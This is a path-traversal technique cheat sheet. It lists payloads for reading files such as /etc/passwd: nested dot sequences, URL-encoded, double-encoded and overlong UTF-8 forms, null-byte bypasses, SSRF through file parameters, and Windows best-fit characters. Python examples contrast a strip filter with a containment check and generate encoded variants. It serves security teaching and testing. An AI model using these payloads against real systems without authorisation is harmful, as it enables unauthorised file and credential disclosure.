Directory Traversal Injection Technique & Evasion
- Finding Path Traversal
Check the files the page loads: if a file is fetched through a server-side reference (a filename or path parameter), that parameter is the candidate.
/image?filename=28.jpg
- Technique
# Use nested traversal (defeats filters that strip "../" or "..\" only once, non-recursively: what remains after the strip is "../" again)
....//
....\/
.|./
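Added illustration of why the nested form works (example code written for this page, not taken from any tool or project; the web root /var/www/images is an assumed value): a filter that deletes "../" in one pass turns "....//" back into "../", while canonicalising first and then checking that the result stays under the base directory needs no stripping at all.

```python
import posixpath

# Assumed web root for the example (not from the page).
BASE_DIR = "/var/www/images"


def naive_strip(user_path: str) -> str:
    """The kind of filter nested traversal defeats: removes every literal
    '../' in a single, non-recursive pass.  '....//' loses its middle '../'
    and the characters that remain spell '../' again."""
    return user_path.replace("../", "")


def vulnerable_resolve(user_path: str) -> str:
    """Strip, then join and normalise.  Normalisation runs after the filter,
    so it sees (and honours) the re-formed '../' sequences."""
    return posixpath.normpath(posixpath.join(BASE_DIR, naive_strip(user_path)))


def safe_resolve(user_path: str) -> str:
    """Do not sanitise; canonicalise, then check containment component-wise.
    posixpath.join discards BASE_DIR when user_path is absolute, so the
    'filename=/etc/passwd' case is caught by the same check."""
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, user_path))
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError(f"path escapes {BASE_DIR}: {candidate!r}")
    return candidate


if __name__ == "__main__":
    probes = ("28.jpg", "../../../etc/passwd", "....//....//....//etc/passwd", "/etc/passwd")
    for p in probes:
        try:
            safe = safe_resolve(p)
        except ValueError as exc:
            safe = f"rejected ({exc})"
        print(f"{p!r:36} strip-filter -> {vulnerable_resolve(p):34} containment -> {safe}")
```

The check runs on the path after the server has percent-decoded it exactly once; on a live filesystem use os.path.realpath instead of normpath so symlinks under the web root cannot point outside it.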
## System Specific
Unix-like OS:
root directory: /
directory separator: /
Windows OS:
root directory: <drive letter>:
directory separator: \ or /
----------------------------------------------------------------------------------
# Use ? as a wildcard character
- ? matches any single character in shell-style (glob) matching, as on Linux; useful when part of the path is filtered or unknown
----------------------------------------------------------------------------------
# Start from the base directory and traverse from there, or try an absolute path / URL scheme if the parameter accepts one
- filename=/var/www/images/../../../etc/passwd
- filename=/etc/passwd
- file=file:///etc/passwd
- file=http://localhost:8080 ---> fetching local services (SSRF through the file parameter)
- file=http://192.168.0.2:9080 ---> fetching internal network services
----------------------------------------------------------------------------------
# Bypass a required file extension with a null byte (works where validation sees the whole string but the underlying C file API stops at the NUL; modern runtimes mostly reject embedded NULs)
filename=../../../etc/passwd%00.png
filename=../../../etc/passwd.ANY%00.png
----------------------------------------------------------------------------------
# Encoding
- URL (single) ---> ../ ---> %2e%2e%2f
- Double URL (server decodes twice) ---> ../ ---> %252e%252e%252f
- UTF-8 ---> ..%c0%af (overlong 2-byte encoding of /, accepted by non-conforming decoders) & ..%ef%bc%8f (UTF-8 of U+FF0F fullwidth solidus, folded to / by normalisation or best-fit mapping)
- Unicode (see the best-fit mapping table below)
## Example (URL)
- . & %00
- %2e%2e%2f ---> ../
- %2e%2e/ ---> ../
- ..%2f ---> ../
- %2e%2e%5c ---> ..\
- %2e%2e\ ---> ..\
- ..%5c ---> ..\
- %252e%252e%255c ---> ..\
- ..%255c ---> ..\
- ...
## Example (UTF-8)
..%c0%af ---> ../
..%c1%9c ---> ..\
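Added example (written for this page, not from any tool) that generates the encoded forms listed above for either separator and models the decoding pipeline that turns each one back into "../": a single or double percent-decode, a lenient UTF-8 decoder that skips the overlong check, and NFKC normalisation as a stand-in for the best-fit code page mapping that folds the fullwidth characters of the table below to "/" and "\". The function names and the choice of NFKC as the normalisation model are this example's own.

```python
import unicodedata
from urllib.parse import unquote_to_bytes

# Encoded forms of the separator as listed on the page.
OVERLONG = {"/": "%c0%af", "\\": "%c1%9c"}    # 2-byte overlong UTF-8 (invalid)
FULLWIDTH = {"/": "\uff0f", "\\": "\uff3c"}   # U+FF0F / U+FF3C, valid UTF-8


def variants(sep: str = "/") -> dict:
    """Encoded forms of '..<sep>' to try against a filename parameter."""
    pct = "%5c" if sep == "\\" else "%2f"
    return {
        "plain":      ".." + sep,
        "url":        "%2e%2e" + pct,
        "double_url": "%252e%252e%25" + pct[1:],
        "overlong":   ".." + OVERLONG[sep],
        "fullwidth":  ".." + "".join(f"%{b:02x}" for b in FULLWIDTH[sep].encode("utf-8")),
    }


def lenient_utf8(data: bytes) -> str:
    """UTF-8 decoder without the overlong check (1- and 2-byte forms only),
    modelling the buggy decoders the %c0%af trick relies on.  A conforming
    decoder (bytes.decode) rejects these byte sequences."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data) and (data[i + 1] & 0xC0) == 0x80:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def server_view(raw: str, rounds: int = 1, strict: bool = True, nfkc: bool = False):
    """What the file-open call sees after the server's decoding pipeline.
    rounds: number of percent-decoding passes (2 models a double-decoding bug)
    strict: reject overlong UTF-8 like a conforming decoder
    nfkc:   compatibility-normalise, folding U+FF0F to '/' and U+FF3C to '\\'
    Returns None when the decoder rejects the input."""
    data = raw.encode("utf-8")
    for _ in range(rounds):
        data = unquote_to_bytes(data)
    try:
        text = data.decode("utf-8") if strict else lenient_utf8(data)
    except UnicodeDecodeError:
        return None
    return unicodedata.normalize("NFKC", text) if nfkc else text


if __name__ == "__main__":
    for name, payload in variants("/").items():
        print(f"{name:10} {payload:16} once:{server_view(payload)!r:12} "
              f"twice:{server_view(payload, rounds=2)!r:8} "
              f"lenient:{server_view(payload, strict=False)!r:8} "
              f"nfkc:{server_view(payload, nfkc=True)!r}")
```

Each payload reaches "../" only under one specific server behaviour, which is why the whole list is worth sending: the double-encoded form needs a second decode, the overlong form needs a non-conforming decoder, and the fullwidth form needs a normalisation or best-fit step after decoding.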
## Unicode (best-fit mapping)
When Windows converts these Unicode characters to the process's ANSI code page, the best-fit mapping yields an ASCII / or \, so they traverse where the ASCII forms are filtered.
Code Page   Unicode   Character   Hexadecimal Equivalent
----------------------------------------------------------
874         U+FF0F    ／          0x002F (/)
874         U+FF3C    ＼          0x005C (\)
932         U+00A5    ¥           0x005C (\)
949         U+20A9    ₩           0x005C (\)
1250        U+2044    ⁄           0x002F (/)
1250        U+2215    ∕           0x002F (/)
1250        U+2216    ∖           0x005C (\)
1250        U+FF0F    ／          0x002F (/)
1250        U+FF3C    ＼          0x005C (\)
1251        U+FF0F    ／          0x002F (/)
1251        U+FF3C    ＼          0x005C (\)
1252        U+2044    ⁄           0x002F (/)
...         ...       ...         ...
More details: https://worst.fit/mapping/#ANSI:0x5C,0x2F